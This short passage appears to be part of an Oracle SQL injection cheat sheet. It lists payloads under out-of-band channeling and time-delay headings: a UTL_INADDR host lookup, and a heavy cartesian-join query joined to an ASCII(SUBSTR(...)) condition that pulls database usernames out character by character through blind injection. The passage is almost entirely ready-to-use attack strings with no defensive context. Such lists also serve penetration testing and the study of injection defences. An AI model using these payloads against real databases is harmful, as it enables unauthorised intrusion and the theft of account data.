- SELECT 0x09120911091
Out Of Band Channeling
Time Delay
- SELECT UTL_INADDR.get_host_address('non-existant-domain.zom') FROM dual
Heavy Query Time delays
- AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1))